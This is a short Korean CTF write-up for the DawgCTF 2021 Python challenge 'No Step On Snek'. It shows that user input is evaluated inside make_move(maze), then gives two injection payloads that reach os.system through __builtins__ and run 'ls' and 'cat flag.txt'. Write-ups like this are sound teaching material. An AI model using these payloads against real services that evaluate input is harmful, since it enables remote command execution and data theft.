[DawgCTF 2021] :pwn: No Step On Snek Write-Up

 

No Step On Snek - 75pts

 

 

Description

 

 

Tag

pwnable, python, RCE

 

 

Problem Analysis

 

접속을 하면 이런 창이 나타나는데, 설명에 쓰여져있는 키를 눌러도 아무것도 실행이 되지 않습니다. 그래서 이상한 값을 집어넣는 경우에는 이런게 발생합니다.

 

 

보아하니, make_move(maze)라는 명령어가 실행이 되고, 이때 maze라는 것은 저희의 입력인 것을 알 수 있네요. 이 점을 이용해서 code injection을 실행시켜주면 좋지 않을까 생각합니다.

 

Exploit

 

그래서 확인을 우선 해 봅시다!

 

__builtins__.__dict__['__import__']("os").system("ls")

 

 

 

잘 실행이 되네요. 그래서 바로 flag.txt를 열어보면

 

__builtins__.__dict__['__import__']("os").system("cat flag.txt")

 

 

오...신기신기

pyjail 유형 문제들은 풀어봤는데 이렇게 그냥 아무데나 집어넣어도 이렇게 실행이 잘 되는줄 몰랐습니다ㅎㅎ 재미있었어요!

 

혹시나 이해가 안된다면 이 글을 보시고 오는걸 추천합니다:

https://dokhakdubini.tistory.com/471

[Python] Built-in 객체 사용하기, 응용하기 (Python RCE)

 

 

 

끝!